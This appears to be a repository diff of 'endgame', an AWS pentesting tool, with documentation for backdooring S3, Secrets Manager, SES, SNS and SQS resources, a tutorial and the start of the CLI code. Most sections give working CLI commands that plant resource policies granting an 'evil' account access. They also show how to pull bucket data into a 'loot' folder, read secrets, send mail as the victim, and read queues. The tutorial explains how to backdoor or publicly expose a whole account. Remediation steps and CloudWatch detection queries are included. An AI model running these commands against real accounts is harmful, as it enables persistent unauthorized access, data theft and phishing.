* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service s3 --name test-resource-exposure
```
* To verify that the S3 bucket has been shared with the public, run the following from the victim account:
```bash
aws s3api get-bucket-policy --bucket test-resource-exposure
```
* Observe that the contents match the example shown below.
## Example
The `get-bucket-policy` command will return the response below. Observe how the Evil Principal (`arn:aws:iam::999988887777:user/evil`) is granted full access to the S3 bucket.
```json
{
"Policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Sid\":\"AllowCurrentAccount\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:evil\"},\"Action\":\"s3:*\",\"Resource\":[\"arn:aws:s3:::test-resource-exposure\",\"arn:aws:s3:::test-resource-exposure/*\"]}]}"
}
```
## Exploitation
```
TODO
```
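One possible exploitation sketch, run with the evil principal's credentials (the `evil` profile name is a placeholder):
```bash
# Enumerate the exposed bucket
aws s3 ls s3://test-resource-exposure/ --recursive --profile evil

# Exfiltrate its contents
aws s3 sync s3://test-resource-exposure ./loot --profile evil
```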
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
* **Leverage Strong Resource-based Policies**: Follow the resource-based policy recommendations in the [Prevention Guide](https://endgame.readthedocs.io/en/latest/prevention/#leverage-strong-resource-based-policies)
* **Trusted Accounts Only**: Ensure that S3 Buckets are only shared with trusted accounts, and that the trusted accounts truly need access to the S3 Bucket.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **Restrict access to IAM permissions that could lead to exposure of your S3 Buckets**: Tightly control access to the following IAM actions:
- [s3:GetBucketPolicy](https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketPolicy.html): _Grants permission to return the policy of the specified bucket. This includes information on which AWS accounts and principals have access to the bucket._
- [s3:ListAllMyBuckets](https://docs.aws.amazon.com/AmazonS3/latest/API/API_ListBuckets.html): _Grants permission to list all buckets owned by the authenticated sender of the request_
- [s3:PutBucketPolicy](https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketPolicy.html): _Grants permission to add or replace a bucket policy on a bucket._
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='s3.amazonaws.com' AND eventName='PutBucketPolicy'
```
The following query detects policy modifications which include the default IOC string:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='s3.amazonaws.com' AND (eventName='PutBucketPolicy' and @message like 'Endgame')
```
(More specific queries related to the policy contents do not work due to how CWL parses the requestParameters object on these calls)
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
- [aws s3api put-bucket-policy](https://docs.aws.amazon.com/cli/latest/reference/s3api/put-bucket-policy.html)
- [aws s3api get-bucket-policy](https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-policy.html)

View File

@ -0,0 +1,119 @@
# Secrets Manager
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* **Option 1**: To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service secretsmanager --name test-resource-exposure
```
* **Option 2**: To expose the resource using AWS CLI, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
export VICTIM_RESOURCE=arn:aws:secretsmanager:us-east-1:111122223333:secret/test-resource-exposure
export EVIL_POLICY='{"Version": "2012-10-17", "Statement": [{"Sid": "Endgame", "Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::999988887777:user/evil"}, "Action": "secretsmanager:*", "Resource": ["arn:aws:secretsmanager:us-east-1:111122223333:secret/test-resource-exposure"]}]}'
aws secretsmanager put-resource-policy --secret-id "$VICTIM_RESOURCE" --resource-policy "$EVIL_POLICY"
```
* To view the contents of the exposed resource policy, run the following:
```bash
aws secretsmanager get-resource-policy --secret-id test-resource-exposure
```
* Observe that the contents of the exposed resource policy match the example shown below.
## Example
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Endgame",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::999988887777:user/evil"
},
"Action": "secretsmanager:*",
"Resource": [
"arn:aws:secretsmanager:us-east-1:111122223333:secret/test-resource-exposure"
]
}
]
}
```
## Exploitation
* Authenticate to the `evil` account (In this example, `arn:aws:iam::999988887777:user/evil`)
* Run the following command in the victim account:
```bash
export VICTIM_RESOURCE=arn:aws:secretsmanager:us-east-1:111122223333:secret/test-resource-exposure
aws secretsmanager get-secret-value --secret-id $VICTIM_RESOURCE
```
* Observe that the output resembles the following:
```json
{
"ARN": "arn:aws:secretsmanager:us-east-1:111122223333:secret/test-resource-exposure",
"Name": "test-resource-exposure",
"VersionId": "DOGECOIN",
"SecretString": "{\n \"username\":\"doge\",\n \"password\":\"coin\"\n}\n",
"VersionStages": [
"AWSCURRENT"
],
"CreatedDate": 1523477145.713
}
```
## Remediation
* **Leverage Strong Resource-based Policies**: Follow the resource-based policy recommendations in the [Prevention Guide](https://endgame.readthedocs.io/en/latest/prevention/#leverage-strong-resource-based-policies)
* **Trusted Accounts Only**: Ensure that Secrets Manager secrets are only shared with trusted accounts, and that the trusted accounts truly need access to the secret.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **AWS Access Analyzer**: Leverage AWS Access Analyzer to report on external access to Secrets Manager secrets. See [the AWS Access Analyzer documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html#access-analyzer-secrets-manager) for more details.
* **Restrict access to IAM permissions that could lead to exposure of your Secrets**: Tightly control access to the following IAM actions:
- [secretsmanager:PutResourcePolicy](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_PutResourcePolicy.html): _Enables the user to attach a resource policy to a secret._
- [secretsmanager:GetSecretValue](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html): _Enables the user to retrieve and decrypt the encrypted data._
- [secretsmanager:DeleteResourcePolicy](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_DeleteResourcePolicy.html): _Enables the user to delete the resource policy attached to a secret._
- [secretsmanager:GetResourcePolicy](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetResourcePolicy.html): _Enables the user to get the resource policy attached to a secret._
- [secretsmanager:ListSecrets](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_ListSecrets.html): _Enables the user to list the available secrets._
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
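If the backdoor policy has already been applied and the secret does not otherwise need a resource policy, the simplest cleanup is to delete the resource policy outright and verify that it is gone. A minimal sketch, using the example secret name from the steps above:
```bash
# Remove the attached resource policy from the secret
aws secretsmanager delete-resource-policy --secret-id test-resource-exposure

# Confirm that no resource policy remains on the secret
aws secretsmanager get-resource-policy --secret-id test-resource-exposure
```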
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='secretsmanager.amazonaws.com' AND (eventName='PutResourcePolicy' or eventName='DeleteResourcePolicy')
```
The following query detects policy modifications which include the default IOC string:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='secretsmanager.amazonaws.com' AND (eventName='PutResourcePolicy' and requestParameters.resourcePolicy like 'Endgame')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
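To run either query from the CLI instead of the console, CloudWatch Logs Insights can be driven with `start-query` and `get-query-results`. A minimal sketch; the log group name below is a placeholder for wherever your CloudTrail trail delivers logs:
```bash
# Hypothetical log group name - replace with your CloudTrail log group
LOG_GROUP="/aws/cloudtrail/my-trail"

# Start an Insights query covering the last 24 hours
QUERY_ID=$(aws logs start-query \
  --log-group-name "$LOG_GROUP" \
  --start-time $(($(date +%s) - 86400)) \
  --end-time $(date +%s) \
  --query-string "fields eventTime, eventSource, eventName, userIdentity.arn, userAgent | filter eventSource='secretsmanager.amazonaws.com' AND (eventName='PutResourcePolicy' or eventName='DeleteResourcePolicy')" \
  --query queryId --output text)

# Fetch the results once the query has had a moment to run
aws logs get-query-results --query-id "$QUERY_ID"
```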
## References
* [aws secretsmanager get-resource-policy](https://docs.aws.amazon.com/cli/latest/reference/secretsmanager/get-resource-policy.html)
* [aws secretsmanager get-secret-value](https://docs.aws.amazon.com/cli/latest/reference/secretsmanager/get-secret-value.html)
* [aws secretsmanager put-resource-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/secretsmanager/put-resource-policy.html)

105
docs/risks/ses.md Normal file
View File

@ -0,0 +1,105 @@
# SES Sender Authorization Policies
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
SES Sending Authorization Policies can be used to add a rogue IAM user as a [Delegate sender](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/sending-authorization-delegate-sender-tasks.html). This can result in a malicious user sending email on behalf of your organization, which could lead to phishing attacks against customers or employees, as well as a loss of consumer trust and reputational damage.
### How it works
Sending authorization is based on sending authorization policies. If you want to enable a delegate sender to send on your behalf, you create a sending authorization policy and associate the policy to your identity by using the Amazon SES console or the Amazon SES API.
When Amazon SES receives the request to send the email, it checks your identity's policy (if present) to determine if you have authorized **the delegate sender** to send on the identity's behalf. If the delegate sender is authorized, Amazon SES accepts the email.
This can be abused by adding a rogue user as a [Delegate sender](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/sending-authorization-delegate-sender-tasks.html).
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service ses --name test-resource-exposure.com
```
* To verify that the sender authorization policy has been set to allow actions from the rogue user, run the following command from the victim account:
```bash
aws ses list-identity-policies --identity test-resource-exposure.com
```
The command above will return the following:
```bash
{
"PolicyNames": [
"Endgame"
]
}
```
* Take the policy name returned by the command above (`Endgame`) and supply it to the command below:
```bash
aws ses get-identity-policies --identity test-resource-exposure.com --policy-names "Endgame"
```
* Observe that the contents match the example shown below
## Example
The policy below grants the Evil Principal (`arn:aws:iam::999988887777:user/evil`) `ses:*` access to the victim resource (`arn:aws:ses:us-east-1:111122223333:identity/test-resource-exposure.com`), indicating a successful compromise.
```json
{
"Policies": {
"Endgame": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Sid\":\"AllowCurrentAccount\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::111122223333:root\"},\"Action\":\"ses:*\",\"Resource\":\"arn:aws:ses:us-east-1:111122223333:identity/test-resource-exposure.com\"},{\"Sid\":\"Endgame\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:user/evil\"},\"Action\":\"ses:*\",\"Resource\":\"arn:aws:ses:us-east-1:111122223333:identity/test-resource-exposure.com\"}]}"
}
}
```
## Exploitation
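Once the sending authorization policy is in place, the delegate sender in the evil account can send mail that appears to come from the victim identity. The following is a minimal, illustrative sketch: the recipient address, subject, and body are hypothetical, and the exact `send-email` flags can vary between AWS CLI versions, so verify against your CLI's documentation before relying on it.
```bash
# From the evil account (arn:aws:iam::999988887777:user/evil), send mail as the victim identity.
# SourceArn identifies the identity that authorized this delegate sender.
aws ses send-email \
  --from admin@test-resource-exposure.com \
  --to target@example.com \
  --subject "Account notice" \
  --text "This message was sent by a delegate sender." \
  --source-arn arn:aws:ses:us-east-1:111122223333:identity/test-resource-exposure.com
```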
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool.
* **Trusted Accounts Only**: Ensure that SES Authorization Policies only authorize specific delegate senders according to your design.
* **Ensure access is necessary**: For any delegate senders that do have access, ensure that the access is absolutely necessary.
* **Restrict access to IAM permissions that could lead to manipulation of your SES Sender Authorization Policies**: Tightly control access to the following IAM actions:
- [ses:PutIdentityPolicy](https://docs.aws.amazon.com/ses/latest/APIReference/API_PutIdentityPolicy.html): _Adds or updates a sending authorization policy for the specified identity (an email address or a domain)_
- [ses:DeleteIdentityPolicy](https://docs.aws.amazon.com/ses/latest/APIReference/API_DeleteIdentityPolicy.html): _Deletes the policy associated with the identity_
- [ses:GetIdentityPolicies](https://docs.aws.amazon.com/ses/latest/APIReference/API_GetIdentityPolicies.html): _Returns the requested sending authorization policies for the given identity (an email address or a domain)_
- [ses:ListIdentities](https://docs.aws.amazon.com/ses/latest/APIReference/API_ListIdentities.html): _Returns a list containing all of the identities (email addresses and domains) for your AWS account, regardless of verification status_
- [ses:ListIdentityPolicies](https://docs.aws.amazon.com/ses/latest/APIReference/API_ListIdentityPolicies.html): _Returns a list of sending authorization policies that are attached to the given identity (an email address or a domain)_
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
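Because the example above shows that the injected sending authorization policy is named `Endgame`, removing it is a single call. A minimal sketch; substitute your own identity and policy name:
```bash
# Delete the rogue sending authorization policy from the identity
aws ses delete-identity-policy --identity test-resource-exposure.com --policy-name Endgame

# Confirm that the policy is no longer attached
aws ses list-identity-policies --identity test-resource-exposure.com
```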
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='ses.amazonaws.com' AND (eventName='PutIdentityPolicy' or eventName='DeleteIdentityPolicy')
```
The following query detects policy modifications which include the default IOC string:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='ses.amazonaws.com' AND (eventName='PutIdentityPolicy' and requestParameters.policyName='Endgame')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [put-identity-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ses/put-identity-policy.html)
* [Sending Authorization Overview](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/sending-authorization-overview.html)
* [Sending Authorization Policy Examples](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/sending-authorization-policy-examples.html)
* [Delegate sender](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/sending-authorization-delegate-sender-tasks.html)

109
docs/risks/sns.md Normal file
View File

@ -0,0 +1,109 @@
# SNS Topics
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service sns --name test-resource-exposure
```
* To verify that the SNS topic has been shared with the evil principal, run the following from the victim account:
```bash
export VICTIM_RESOURCE=arn:aws:sns:us-east-1:111122223333:test-resource-exposure
aws sns get-topic-attributes \
--topic-arn $VICTIM_RESOURCE
```
* Observe that the contents match the example shown below.
## Example
The output will have the following structure:
```json
{
"Attributes": {
"SubscriptionsConfirmed": "1",
"DisplayName": "my-topic",
"SubscriptionsDeleted": "0",
"EffectiveDeliveryPolicy": "",
"Owner": "111122223333",
"Policy": "SeeBelow",
"TopicArn": "arn:aws:sns:us-east-1:111122223333:test-resource-exposure",
"SubscriptionsPending": "0"
}
}
```
The prettified version of the `Policy` key is below. Observe how the content of the policy grants the evil principal's account ID (`999988887777`) maximum access to the SNS topic.
```json
{
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "Endgame",
"Effect": "Allow",
"Principal": {
"AWS": "999988887777"
},
"Action": [
"SNS:AddPermission",
"SNS:DeleteTopic",
"SNS:GetTopicAttributes",
"SNS:ListSubscriptionsByTopic",
"SNS:Publish",
"SNS:Receive",
"SNS:RemovePermission",
"SNS:SetTopicAttributes",
"SNS:Subscribe"
],
"Resource": "arn:aws:sns:us-east-1:111122223333:test-resource-exposure"
}
]
}
```
## Exploitation
```
TODO
```
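Until the placeholder above is filled in, the following is a minimal sketch of what exploitation could look like. Because the injected policy grants the evil account `SNS:Subscribe`, `SNS:Receive`, and `SNS:Publish`, an attacker could subscribe their own endpoint to the topic or publish messages to downstream consumers. The email address below is hypothetical:
```bash
# From the evil account, subscribe an attacker-controlled endpoint to the victim topic
export VICTIM_RESOURCE=arn:aws:sns:us-east-1:111122223333:test-resource-exposure
aws sns subscribe \
  --topic-arn $VICTIM_RESOURCE \
  --protocol email \
  --notification-endpoint evil@example.com

# Publish a message to every existing subscriber of the topic
aws sns publish --topic-arn $VICTIM_RESOURCE --message "Hello from the evil account"
```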
## Remediation
* **Trusted Accounts Only**: Ensure that SNS Topics are only shared with trusted accounts, and that the trusted accounts truly need access to the SNS Topic.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **AWS Access Analyzer**: Leverage AWS Access Analyzer to report on external access to SNS Topics. See [the AWS Access Analyzer documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html) for more details.
* **Restrict access to IAM permissions that could lead to exposure of your SNS Topics**: Tightly control access to the following IAM actions:
- [sns:AddPermission](https://docs.aws.amazon.com/sns/latest/api/API_AddPermission.html): _Adds a statement to a topic's access control policy, granting access for the specified AWS accounts to the specified actions._
- [sns:RemovePermission](https://docs.aws.amazon.com/sns/latest/api/API_RemovePermission.html): _Removes a statement from a topic's access control policy._
- [sns:GetTopicAttributes](https://docs.aws.amazon.com/sns/latest/api/API_GetTopicAttributes.html): _Returns all of the properties of a topic. This includes the resource-based policy document for the SNS Topic, which lists information about who is authorized to access the SNS Topic_
- [sns:ListTopics](https://docs.aws.amazon.com/sns/latest/api/API_ListTopics.html): _Returns a list of the requester's topics._
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
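If the backdoor statement shown above has already been added, it can be removed by label and the result verified. A minimal sketch, assuming the statement's Sid matches the label `Endgame`:
```bash
# Remove the statement with the label/Sid "Endgame" from the topic policy
export VICTIM_RESOURCE=arn:aws:sns:us-east-1:111122223333:test-resource-exposure
aws sns remove-permission --topic-arn $VICTIM_RESOURCE --label Endgame

# Confirm that the Policy attribute no longer contains the Endgame statement
aws sns get-topic-attributes --topic-arn $VICTIM_RESOURCE
```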
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='sns.amazonaws.com' AND (eventName='AddPermission' or eventName='RemovePermission')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [add-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sns/add-permission.html)

75
docs/risks/sqs.md Normal file
View File

@ -0,0 +1,75 @@
# SQS Queues
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service sqs --name test-resource-exposure
```
* To verify that the SQS queue has been shared with a rogue user, run the following from the victim account:
```bash
export QUEUE_URL=$(aws sqs get-queue-url --queue-name test-resource-exposure | jq -r '.QueueUrl')
aws sqs get-queue-attributes --queue-url $QUEUE_URL --attribute-names Policy
```
* Observe that the contents match the example shown below.
## Example
The policy below grants the Evil Principal's account ID (`999988887777`) `sqs:*` access to the victim resource (`arn:aws:sqs:us-east-1:111122223333:test-resource-exposure`), indicating a successful compromise.
```json
{
"Attributes": {
"Policy": "{\"Version\":\"2008-10-17\",\"Id\":\"arn:aws:sqs:us-east-1:111122223333:test-resource-exposure/SQSDefaultPolicy\",\"Statement\":[{\"Sid\":\"AllowCurrentAccount\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::111122223333:root\"},\"Action\":\"SQS:*\",\"Resource\":\"arn:aws:sqs:us-east-1:111122223333:test-resource-exposure\"},{\"Sid\":\"Endgame\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:root\"},\"Action\":\"SQS:*\",\"Resource\":\"arn:aws:sqs:us-east-1:111122223333:test-resource-exposure\"}]}"
}
}
```
## Exploitation
```
TODO
```
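Until the placeholder above is filled in, the following is a minimal sketch of what exploitation could look like. The injected policy grants the evil account `SQS:*`, so an attacker could read messages off the queue or inject their own. The queue URL follows the standard `https://sqs.<region>.amazonaws.com/<account-id>/<queue-name>` format:
```bash
# From the evil account, read (and optionally delete) messages from the victim queue
export QUEUE_URL=https://sqs.us-east-1.amazonaws.com/111122223333/test-resource-exposure
aws sqs receive-message --queue-url $QUEUE_URL --max-number-of-messages 10

# Inject a message that downstream consumers in the victim account will process
aws sqs send-message --queue-url $QUEUE_URL --message-body "Hello from the evil account"
```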
## Remediation
* **Trusted Accounts Only**: Ensure that SQS Queues are only shared with trusted accounts, and that the trusted accounts truly need access to the SQS Queue.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **AWS Access Analyzer**: Leverage AWS Access Analyzer to report on external access to SQS Queues. See [the AWS Access Analyzer documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html) for more details.
* **Restrict access to IAM permissions that could lead to exposure of your SQS Queues**: Tightly control access to the following IAM actions:
- [sqs:AddPermission](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/APIReference/API_AddPermission.html): _Adds a permission to a queue for a specific principal._
- [sqs:RemovePermission](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/APIReference/API_RemovePermission.html): _Revokes any permissions in the queue policy that matches the specified Label parameter._
- [sqs:GetQueueAttributes](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/APIReference/API_GetQueueAttributes.html): _Gets attributes for the specified queue. This includes retrieving the list of principals who are authorized to access the queue._
- [sqs:GetQueueUrl](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/APIReference/API_GetQueueUrl.html): _Returns the URL of an existing queue._
- [sqs:ListQueues](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/APIReference/API_ListQueues.html): _Returns a list of your queues._
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
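If the backdoor statement shown above has already been added, it can be removed by label, since `sqs:RemovePermission` revokes the statement in the queue policy that matches the specified Label. A minimal sketch, assuming the statement's Sid/Label is `Endgame`:
```bash
# Remove the statement labeled "Endgame" from the queue policy and verify the result
export QUEUE_URL=$(aws sqs get-queue-url --queue-name test-resource-exposure | jq -r '.QueueUrl')
aws sqs remove-permission --queue-url $QUEUE_URL --label Endgame
aws sqs get-queue-attributes --queue-url $QUEUE_URL --attribute-names Policy
```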
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='sqs.amazonaws.com' AND (eventName='AddPermission' or eventName='RemovePermission')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [aws sqs add-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sqs/add-permission.html)
* [aws sqs get-queue-attributes](https://docs.aws.amazon.com/cli/latest/reference/sqs/get-queue-attributes.html)

100
docs/tutorial.md Normal file
View File

@ -0,0 +1,100 @@
# Tutorial
The prerequisite for an attacker running Endgame is access to AWS API credentials for the victim account that have privileges to update resource policies.
Endgame can run in two modes: `expose` or `smash`. The less destructive `expose` mode is surgical, updating the resource policy on a single attacker-defined resource to include a backdoor to a principal they control (or to the internet if they're mean).
`smash`, on the other hand, is more destructive (and louder). `smash` can run against a single service or all supported services. In either case, for each service it enumerates the resources in that region, reads the current resource policy on each, and applies a new policy that includes the "evil principal" the attacker has specified. The net effect is that, depending on the privileges they have in the victim account, an attacker can insert dozens of backdoors that are not controlled by the victim's IAM policies.
## Step 1: Setup
* First, authenticate to AWS CLI using credentials to the victim's account.
* Set the environment variables for `EVIL_PRINCIPAL` (required). Optionally, set the environment variables for `AWS_REGION` and `AWS_PROFILE`.
```bash
# Set `EVIL_PRINCIPAL` environment variable to the rogue IAM User or
# Role that you want to give access to.
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
# If you don't supply these values, these will be the defaults.
export AWS_REGION="us-east-1"
export AWS_PROFILE="default"
```
## Step 2: Create Demo Infrastructure
This program makes modifications to live AWS Infrastructure, which can vary from account to account. We have bootstrapped some of this for you using [Terraform](https://www.terraform.io/intro/index.html). **Note: This will create real AWS infrastructure and will cost you money.**
```bash
# To create the demo infrastructure
make terraform-demo
```
## Step 3: List Victim Resources
You can use the `list-resources` command to list resources in the account that you can backdoor.
* Examples:
```bash
# List IAM Roles, so you can create a backdoor via their AssumeRole policies
endgame list-resources -s iam
# List S3 buckets, so you can create a backdoor via their Bucket policies
endgame list-resources --service s3
# List all resources across services that can be backdoored
endgame list-resources --service all
```
## Step 4: Backdoor specific resources
* Use the `--dry-run` flag first to test the command without modifying anything:
```bash
endgame expose --service iam --name test-resource-exposure --dry-run
```
* To create the backdoor to that resource from your rogue account, run the following:
```bash
endgame expose --service iam --name test-resource-exposure
```
Example output:
![expose](images/add-myself-foreal.png)
## Step 5: Roll back changes
* If you want to atone for your sins (optional), you can use the `--undo` flag to roll back the changes.
```bash
endgame expose --service iam --name test-resource-exposure --undo
```
![expose undo](images/add-myself-undo.png)
## Step 6: Smash your AWS Account to Pieces
* To expose every exposable resource in your AWS account, run the following commands.
> Warning: If you supply the argument `--evil-principal *` or the environment variable `EVIL_PRINCIPAL=*`, it will expose the account to the internet. If you do this, it is possible that an attacker could assume your privileged IAM roles, take over the other [supported resources](https://endgame.readthedocs.io/en/latest/#supported-backdoors) present in that account, or incur a massive bill. As such, you might want to set `--evil-principal` to your own AWS user/role in another account.
```bash
endgame smash --service all --dry-run
endgame smash --service all
endgame smash --service all --undo
```
## Step 7: Destroy Demo Infrastructure
* Now that you are done with the tutorial, don't forget to clean up the demo infrastructure.
```bash
# Destroy the demo infrastructure
make terraform-destroy
```

53
endgame/__init__.py Normal file
View File

@ -0,0 +1,53 @@
# pylint: disable=missing-module-docstring
import logging
from logging import NullHandler
# Set default handler when endgame is used as library to avoid "No handler found" warnings.
logging.getLogger(__name__).addHandler(NullHandler())
def set_stream_logger(name="endgame", level=logging.DEBUG, format_string=None):
"""
Add a stream handler for the given name and level to the logging module.
By default, this logs all endgame messages to ``stdout``.
>>> import endgame
>>> endgame.set_stream_logger('endgame.database.build', logging.INFO)
:type name: string
:param name: Log name
:type level: int
:param level: Logging level, e.g. ``logging.INFO``
:type format_string: str
:param format_string: Log message format
"""
# remove existing handlers. since NullHandler is added by default
handlers = logging.getLogger(name).handlers
for handler in handlers:
logging.getLogger(name).removeHandler(handler)
if format_string is None:
format_string = "%(asctime)s %(name)s [%(levelname)s] %(message)s"
logger = logging.getLogger(name)
logger.setLevel(level)
handler = logging.StreamHandler()
handler.setLevel(level)
formatter = logging.Formatter(format_string)
handler.setFormatter(formatter)
logger.addHandler(handler)
def set_log_level(verbose):
"""
Set Log Level based on click's count argument.
Default log level to critical; otherwise, set to: warning for -v, info for -vv, debug for -vvv
:param verbose: integer for verbosity count.
:return:
"""
if verbose == 1:
set_stream_logger(level=getattr(logging, "WARNING"))
elif verbose == 2:
set_stream_logger(level=getattr(logging, "INFO"))
elif verbose >= 3:
set_stream_logger(level=getattr(logging, "DEBUG"))
else:
set_stream_logger(level=getattr(logging, "CRITICAL"))

0
endgame/bin/__init__.py Normal file
View File

28
endgame/bin/cli.py Normal file
View File

@ -0,0 +1,28 @@
#! /usr/bin/env python
import click
from endgame import command
from endgame.bin.version import __version__
@click.group()
@click.version_option(version=__version__)
def endgame():
"""
An AWS Pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account - or share the resources with the entire internet 😈
"""
endgame.add_command(command.list_resources.list_resources)
endgame.add_command(command.expose.expose)
endgame.add_command(command.smash.smash)
def main():
"""
An AWS Pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account - or share the resources with the entire internet 😈
"""
endgame()
if __name__ == "__main__":
main()

1
endgame/bin/version.py Normal file
View File

@ -0,0 +1 @@
__version__ = "0.2.0"

View File

@ -0,0 +1,3 @@
from endgame.command import list_resources
from endgame.command import expose
from endgame.command import smash

240
endgame/command/expose.py Normal file
View File

@ -0,0 +1,240 @@
"""
Expose AWS resources
"""
import json
